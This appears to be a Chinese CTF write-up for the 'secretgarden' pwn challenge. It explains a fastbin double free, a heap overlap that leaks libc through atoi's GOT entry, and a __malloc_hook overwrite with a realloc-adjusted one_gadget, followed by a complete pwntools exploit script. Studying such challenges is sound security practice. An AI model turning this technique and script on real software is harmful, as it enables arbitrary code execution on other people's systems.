前置知识
fastbin attack
- 堆风水
realloc
调整栈帧打one_gadget
整体思路
首先大致看下程序,没有edit
,但是在delete
部分有double free
。clean
我的方法是没用到,下面的删除都不包括这个操作。
首先,申请两个大小为0x28
的chunk1
和chunk2
,然后delete 1, delete 2, delete 3
来构造double free
。接着申请一个大小为0x40
的chunk 3
,此时chunk 3
的指针是chunk 1
。然后再次申请一个大小为0x28
的chunk 4
,那么chunk 4
的指针就是chunk2
, chunk4
的内容就是chunk1
。由于chunk1
是chunk3
的指针,我们在申请chunk 4
的时候编辑chunk 1
,就可以编辑chunk3
的指针了。如此一来我们把chunk3
的指针中的堆块地址编辑为atoi
的got
表地址,然后show
就可以泄露出libc
地址。
接下来打double free
打malloc_hook
就可以了。
我是用堆风水做的,做完之后看师傅们的wp
方法都有直接double free
打got
表的,但是我做的时候没有看到说是got
表有fake chunk
可以用来打fastbin attack
。
exp
from pwn import *
from LibcSearcher import *
filename = './secretgarden'
context(log_level='debug')
local = 1
all_logs = []
elf = ELF(filename)
libc = ELF('/glibc/2.23-0ubuntu11_amd64/libc.so.6')
if local:
sh = process(filename)
else:
sh = remote('node4.buuoj.cn', 26157)
def debug():
for an_log in all_logs:
success(an_log)
pid = util.proc.pidof(sh)[0]
gdb.attach(pid)
pause()
choice_words = 'Your choice : '
menu_add = 1
add_index_words = ''
add_size_words = 'Length of the name :'
add_content_words = 'The name of flower :'
add_color_words = 'The color of the flower :'
menu_del = 3
del_index_words = 'Which flower do you want to remove from the garden:'
menu_show = 2
show_index_words = ''
menu_edit = 4
edit_index_words = ''
edit_size_words = ''
edit_content_words = ''
def add(index=-1, size=-1, content='', color=''):
sh.sendlineafter(choice_words, str(menu_add))
if add_index_words:
sh.sendlineafter(add_index_words, str(index))
if add_size_words:
sh.sendlineafter(add_size_words, str(size))
if add_content_words:
sh.sendafter(add_content_words, content)
if add_color_words:
sh.sendlineafter(add_color_words, color)
def delete(index=-1):
sh.sendlineafter(choice_words, str(menu_del))
if del_index_words:
sh.sendlineafter(del_index_words, str(index))
def show(index=-1):
sh.sendlineafter(choice_words, str(menu_show))
if show_index_words:
sh.sendlineafter(show_index_words, str(index))
def clean(index=-1, size=-1, content=''):
sh.sendlineafter(choice_words, str(menu_edit))
if edit_index_words:
sh.sendlineafter(edit_index_words, str(index))
if edit_size_words:
sh.sendlineafter(edit_size_words, str(size))
if edit_content_words:
sh.sendafter(edit_content_words, content)
def leak_info(name, addr):
output_log = '{} => {}'.format(name, hex(addr))
all_logs.append(output_log)
success(output_log)
# 第一步:利用double free+堆风水,来泄露libc地址,第0个chunk没啥用其实
add(size=0x4f0, content='111', color='222') # 0
add(size=0x28, content='111', color='222') # 1
add(size=0x28, content='333', color='444') # 2
delete(index=1)
delete(index=2)
delete(index=1)
add(size=0x40, content='aaa', color='bbb') # 3
delete(index=3) # 这里要delete是因为让size为0x30的fastbin复原
payload = p64(1) + p64(elf.got['atoi'])
add(size=0x28, content=payload, color='111') # 4
show()
leak_addr = u64((sh.recvuntil('\x7f')[-6:]).ljust(8, b'\x00'))
leak_info('leak_addr', leak_addr)
libc.address = leak_addr - 0x36e80
leak_info('libc.address', libc.address)
fake_realloc_chunk = libc.address + 0x3c4aed
add(size=0x68, content='11', color='22') # 5
add(size=0x68, content='11', color='22') # 6
delete(index=5)
delete(index=6)
delete(index=5)
# 0xb
leak_info('fake_realloc_addr', fake_realloc_chunk)
payload = p64(fake_realloc_chunk)
add(size=0x68, content=payload, color='zzz') # 7
add(size=0x68, content='xxx', color='zzz') # 8
add(size=0x68, content='xxx', color='zzz') # 9
one_gadget = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
payload = b'a'*0xb + p64(libc.address + one_gadget[1]) + p64(libc.sym['realloc'] + 12)
add(size=0x68, content=payload, color='qqq') # 10
sh.sendlineafter('Your choice : ', '1')
# sh.interactive()
debug()